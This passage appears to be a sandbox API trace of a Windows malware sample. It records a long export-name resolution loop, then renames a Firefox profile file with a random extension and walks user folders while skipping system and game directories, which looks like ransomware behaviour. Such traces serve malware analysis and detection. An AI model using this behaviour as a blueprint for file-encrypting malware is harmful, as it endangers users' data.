returned="CreateFileMappingNumaW" [0080.615] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.615] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.616] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.616] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.616] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.616] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.616] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.616] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.616] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.616] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.616] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.616] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.616] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.616] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.616] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.616] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.616] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.616] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.616] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.616] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.616] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.617] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.617] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.617] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.617] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.617] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.617] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.617] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.617] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.617] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.617] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.617] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.617] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.617] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.617] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.617] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.617] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.617] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.617] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.618] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.618] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.618] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.618] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.618] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.618] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.618] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.618] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.618] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.618] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.618] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.618] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.618] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.619] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.619] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.619] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.619] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.619] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.619] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.619] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.619] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.619] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.619] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.619] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.619] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.619] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.619] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.619] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.619] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.619] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.619] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.619] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.620] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.620] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.620] lstrlenA (lpString="DELETEATOM") returned 10 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.620] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.620] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.620] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.620] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.620] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.620] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.620] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.620] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.620] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.620] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.620] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.620] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.620] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.620] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.620] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.620] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.621] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.621] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.621] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.621] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.621] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.621] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.621] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.621] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.621] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.621] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.621] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.621] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.621] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.621] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.621] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.621] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.621] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.621] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.621] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.621] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.622] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.622] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.622] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.622] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.622] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.622] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.622] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.622] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.622] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned 99 [0080.622] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.VCtDYQF") returned 107 [0080.622] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.VCtDYQF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json.vctdyqf"), dwFlags=0x0) returned 1 [0080.623] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.623] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.623] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.623] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarkbackups", cAlternateFileName="BOOKMA~1")) returned 1 [0080.623] lstrcmpW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0080.623] lstrcmpW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0080.623] lstrcatW (in: lpString1="bookmarkbackups", lpString2="\\" | out: lpString1="bookmarkbackups\\") returned="bookmarkbackups\\" [0080.624] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\Program Files") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch=":\\Windows") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\Games\\") returned 0x0 [0080.624] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 